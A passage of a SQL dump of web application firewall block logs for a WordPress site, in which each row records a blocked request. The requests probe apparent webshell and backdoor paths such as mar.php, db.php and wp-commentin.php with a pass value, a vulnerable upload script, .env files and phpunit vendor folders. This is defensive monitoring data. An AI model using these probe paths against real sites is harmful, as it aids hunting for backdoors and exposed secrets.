7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=\",\"path\":\"L3dwLWNvbnRlbnQvdGhlbWVzL3Nlb3RoZW1lL21hci5waHA=\",\"category\":\"brute-force\",\"ssl\":1}'),(11401,1673930941.757723,1673930941.615000,'\0\0\0\0\0\0\0\0\0\0���$N',0,403,0,0,0,'https://www.dailyjolly.co.uk/wp-content/plugins/seoplugins/mar.php','www.google.com','Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=\",\"path\":\"L3dwLWNvbnRlbnQvcGx1Z2lucy9zZW9wbHVnaW5zL21hci5waHA=\",\"category\":\"brute-force\",\"ssl\":1}'),(11402,1673930935.274688,1673930935.099700,'\0\0\0\0\0\0\0\0\0\0���$N',0,403,0,0,0,'https://www.dailyjolly.co.uk/wp-content/plugins/seoplugins/mar.php','www.google.com','Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=\",\"path\":\"L3dwLWNvbnRlbnQvcGx1Z2lucy9zZW9wbHVnaW5zL21hci5waHA=\",\"category\":\"brute-force\",\"ssl\":1}'),(11403,1673933149.622201,1673933149.497600,'\0\0\0\0\0\0\0\0\0\0��+�z5',0,403,0,0,0,'https://www.dailyjolly.co.uk/wp-content/themes/seotheme/mar.php','www.google.com','Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=\",\"path\":\"L3dwLWNvbnRlbnQvdGhlbWVzL3Nlb3RoZW1lL21hci5waHA=\",\"category\":\"brute-force\",\"ssl\":1}'),(11404,1673933145.548499,1673933145.409500,'\0\0\0\0\0\0\0\0\0\0��+�z5',0,403,0,0,0,'https://www.dailyjolly.co.uk/wp-content/themes/seotheme/mar.php','www.google.com','Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=\",\"path\":\"L3dwLWNvbnRlbnQvdGhlbWVzL3Nlb3RoZW1lL21hci5waHA=\",\"category\":\"brute-force\",\"ssl\":1}'),(11405,1673933138.525370,1673933138.397700,'\0\0\0\0\0\0\0\0\0\0��+�z5',0,403,0,0,0,'https://www.dailyjolly.co.uk/wp-content/plugins/seoplugins/mar.php','www.google.com','Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=\",\"path\":\"L3dwLWNvbnRlbnQvcGx1Z2lucy9zZW9wbHVnaW5zL21hci5waHA=\",\"category\":\"brute-force\",\"ssl\":1}'),(11406,1673933134.572785,1673933134.443000,'\0\0\0\0\0\0\0\0\0\0��+�z5',0,403,0,0,0,'https://www.dailyjolly.co.uk/wp-content/plugins/seoplugins/mar.php','www.google.com','Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=\",\"path\":\"L3dwLWNvbnRlbnQvcGx1Z2lucy9zZW9wbHVnaW5zL21hci5waHA=\",\"category\":\"brute-force\",\"ssl\":1}'),(11407,1673935461.318442,1673935461.201800,'\0\0\0\0\0\0\0\0\0\0��+�z5',0,403,0,0,0,'https://www.dailyjolly.co.uk/wp-content/themes/seotheme/mar.php','www.google.com','Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=\",\"path\":\"L3dwLWNvbnRlbnQvdGhlbWVzL3Nlb3RoZW1lL21hci5waHA=\",\"category\":\"brute-force\",\"ssl\":1}'),(11408,1673935457.367543,1673935457.239000,'\0\0\0\0\0\0\0\0\0\0��+�z5',0,403,0,0,0,'https://www.dailyjolly.co.uk/wp-content/themes/seotheme/mar.php','www.google.com','Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=\",\"path\":\"L3dwLWNvbnRlbnQvdGhlbWVzL3Nlb3RoZW1lL21hci5waHA=\",\"category\":\"brute-force\",\"ssl\":1}'),(11409,1673935451.907812,1673935451.776700,'\0\0\0\0\0\0\0\0\0\0��+�z5',0,403,0,0,0,'https://www.dailyjolly.co.uk/wp-content/plugins/seoplugins/mar.php','www.google.com','Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=\",\"path\":\"L3dwLWNvbnRlbnQvcGx1Z2lucy9zZW9wbHVnaW5zL21hci5waHA=\",\"category\":\"brute-force\",\"ssl\":1}'),(11410,1673935445.810285,1673935445.683600,'\0\0\0\0\0\0\0\0\0\0��+�z5',0,403,0,0,0,'https://www.dailyjolly.co.uk/wp-content/plugins/seoplugins/mar.php','www.google.com','Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=\",\"path\":\"L3dwLWNvbnRlbnQvcGx1Z2lucy9zZW9wbHVnaW5zL21hci5waHA=\",\"category\":\"brute-force\",\"ssl\":1}'),(11411,1673946350.903771,1673946350.770300,'\0\0\0\0\0\0\0\0\0\0���&�',0,403,0,0,0,'https://dailyjolly.co.uk/wp-content/plugins/seo-watcher/ofc/php-ofc-library/ofc_upload_image.php',NULL,'ALittle Client','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"QUxpdHRsZSBDbGllbnQ=\",\"path\":\"L3dwLWNvbnRlbnQvcGx1Z2lucy9zZW8td2F0Y2hlci9vZmMvcGhwLW9mYy1saWJyYXJ5L29mY191cGxvYWRfaW1hZ2UucGhw\",\"category\":\"brute-force\",\"ssl\":1}'),(11412,1673951885.182805,1673951885.064300,'\0\0\0\0\0\0\0\0\0\0���$N',0,403,0,0,0,'https://www.dailyjolly.co.uk/wp-content/themes/seotheme/mar.php','www.google.com','Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=\",\"path\":\"L3dwLWNvbnRlbnQvdGhlbWVzL3Nlb3RoZW1lL21hci5waHA=\",\"category\":\"brute-force\",\"ssl\":1}'),(11413,1673951882.544977,1673951882.413000,'\0\0\0\0\0\0\0\0\0\0���$N',0,403,0,0,0,'https://www.dailyjolly.co.uk/wp-content/themes/seotheme/mar.php','www.google.com','Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=\",\"path\":\"L3dwLWNvbnRlbnQvdGhlbWVzL3Nlb3RoZW1lL21hci5waHA=\",\"category\":\"brute-force\",\"ssl\":1}'),(11414,1673951872.212997,1673951872.080100,'\0\0\0\0\0\0\0\0\0\0���$N',0,403,0,0,0,'https://www.dailyjolly.co.uk/wp-content/plugins/seoplugins/mar.php','www.google.com','Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=\",\"path\":\"L3dwLWNvbnRlbnQvcGx1Z2lucy9zZW9wbHVnaW5zL21hci5waHA=\",\"category\":\"brute-force\",\"ssl\":1}'),(11415,1673951862.980552,1673951862.850900,'\0\0\0\0\0\0\0\0\0\0���$N',0,403,0,0,0,'https://www.dailyjolly.co.uk/wp-content/plugins/seoplugins/mar.php','www.google.com','Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=\",\"path\":\"L3dwLWNvbnRlbnQvcGx1Z2lucy9zZW9wbHVnaW5zL21hci5waHA=\",\"category\":\"brute-force\",\"ssl\":1}'),(11416,1673963966.870668,1673963966.758900,'\0\0\0\0\0\0\0\0\0\0��/[.�',0,403,0,0,0,'https://www.dailyjolly.co.uk/wp-content/themes/seotheme/db.php?u=','www.google.com','Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=\",\"path\":\"L3dwLWNvbnRlbnQvdGhlbWVzL3Nlb3RoZW1lL2RiLnBocA==\",\"category\":\"brute-force\",\"ssl\":1}'),(11417,1673963965.316856,1673963965.188300,'\0\0\0\0\0\0\0\0\0\0��/[.�',0,403,0,0,0,'https://www.dailyjolly.co.uk/wp-content/themes/seotheme/db.php?u=','www.google.com','Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=\",\"path\":\"L3dwLWNvbnRlbnQvdGhlbWVzL3Nlb3RoZW1lL2RiLnBocA==\",\"category\":\"brute-force\",\"ssl\":1}'),(11418,1673964252.420160,1673964252.293400,'\0\0\0\0\0\0\0\0\0\0��PL3',0,403,0,0,0,'https://dailyjolly.co.uk/css/',NULL,'Mozilla/5.0 (X11; Ubuntu; Linux i686; rv:28.0) Gecko/20100101 Firefox/28.0','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"TW96aWxsYS81LjAgKFgxMTsgVWJ1bnR1OyBMaW51eCBpNjg2OyBydjoyOC4wKSBHZWNrby8yMDEwMDEwMSBGaXJlZm94LzI4LjA=\",\"path\":\"L2Nzcy8=\",\"category\":\"brute-force\",\"ssl\":1}'),(11419,1673964202.086250,1673964201.958700,'\0\0\0\0\0\0\0\0\0\0��PL3',0,403,0,0,0,'https://dailyjolly.co.uk/.env/',NULL,'Mozilla/5.0 (X11; Ubuntu; Linux i686; rv:28.0) Gecko/20100101 Firefox/28.0','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"TW96aWxsYS81LjAgKFgxMTsgVWJ1bnR1OyBMaW51eCBpNjg2OyBydjoyOC4wKSBHZWNrby8yMDEwMDEwMSBGaXJlZm94LzI4LjA=\",\"path\":\"Ly5lbnYv\",\"category\":\"brute-force\",\"ssl\":1}'),(11420,1673964179.669054,1673964179.541400,'\0\0\0\0\0\0\0\0\0\0��PL3',0,403,0,0,0,'https://dailyjolly.co.uk/vendor/phpunit/phpunit/LICENSE',NULL,'Mozilla/5.0 (X11; Ubuntu; Linux i686; rv:28.0) Gecko/20100101 Firefox/28.0','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"TW96aWxsYS81LjAgKFgxMTsgVWJ1bnR1OyBMaW51eCBpNjg2OyBydjoyOC4wKSBHZWNrby8yMDEwMDEwMSBGaXJlZm94LzI4LjA=\",\"path\":\"L3ZlbmRvci9waHB1bml0L3BocHVuaXQvTElDRU5TRQ==\",\"category\":\"brute-force\",\"ssl\":1}'),(11421,1673964871.184446,1673964871.045200,'\0\0\0\0\0\0\0\0\0\0���5u�',0,403,0,0,0,'https://www.dailyjolly.co.uk/wp-content/plugins/seoplugins/mar.php','www.google.com','Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=\",\"path\":\"L3dwLWNvbnRlbnQvcGx1Z2lucy9zZW9wbHVnaW5zL21hci5waHA=\",\"category\":\"brute-force\",\"ssl\":1}'),(11422,1673964862.092815,1673964861.965900,'\0\0\0\0\0\0\0\0\0\0���5u�',0,403,0,0,0,'https://www.dailyjolly.co.uk/wp-content/plugins/seoplugins/mar.php','www.google.com','Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=\",\"path\":\"L3dwLWNvbnRlbnQvcGx1Z2lucy9zZW9wbHVnaW5zL21hci5waHA=\",\"category\":\"brute-force\",\"ssl\":1}'),(11423,1673964919.231718,1673964919.105100,'\0\0\0\0\0\0\0\0\0\0���5u�',0,403,0,0,0,'https://www.dailyjolly.co.uk/wp-content/themes/seotheme/mar.php','www.google.com','Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=\",\"path\":\"L3dwLWNvbnRlbnQvdGhlbWVzL3Nlb3RoZW1lL21hci5waHA=\",\"category\":\"brute-force\",\"ssl\":1}'),(11424,1673964897.199761,1673964897.070300,'\0\0\0\0\0\0\0\0\0\0���5u�',0,403,0,0,0,'https://www.dailyjolly.co.uk/wp-content/themes/seotheme/mar.php','www.google.com','Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=\",\"path\":\"L3dwLWNvbnRlbnQvdGhlbWVzL3Nlb3RoZW1lL21hci5waHA=\",\"category\":\"brute-force\",\"ssl\":1}'),(11425,1673975296.687247,1673975296.107800,'\0\0\0\0\0\0\0\0\0\0��/[.�',0,403,0,0,0,'https://www.dailyjolly.co.uk/wp-content/themes/seotheme/db.php?u=','www.google.com','Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=\",\"path\":\"L3dwLWNvbnRlbnQvdGhlbWVzL3Nlb3RoZW1lL2RiLnBocA==\",\"category\":\"brute-force\",\"ssl\":1}'),(11426,1673975294.953436,1673975294.789500,'\0\0\0\0\0\0\0\0\0\0��/[.�',0,403,0,0,0,'https://www.dailyjolly.co.uk/wp-content/themes/seotheme/db.php?u=','www.google.com','Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=\",\"path\":\"L3dwLWNvbnRlbnQvdGhlbWVzL3Nlb3RoZW1lL2RiLnBocA==\",\"category\":\"brute-force\",\"ssl\":1}'),(11427,1673978408.828495,1673978408.701200,'\0\0\0\0\0\0\0\0\0\0��\n3',0,403,0,0,0,'https://www.dailyjolly.co.uk/site/wp-commentin.php?pass=f0aab4595a024d626315fb786dce8282','www.google.com','Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36','blocked:waf','Known malicious 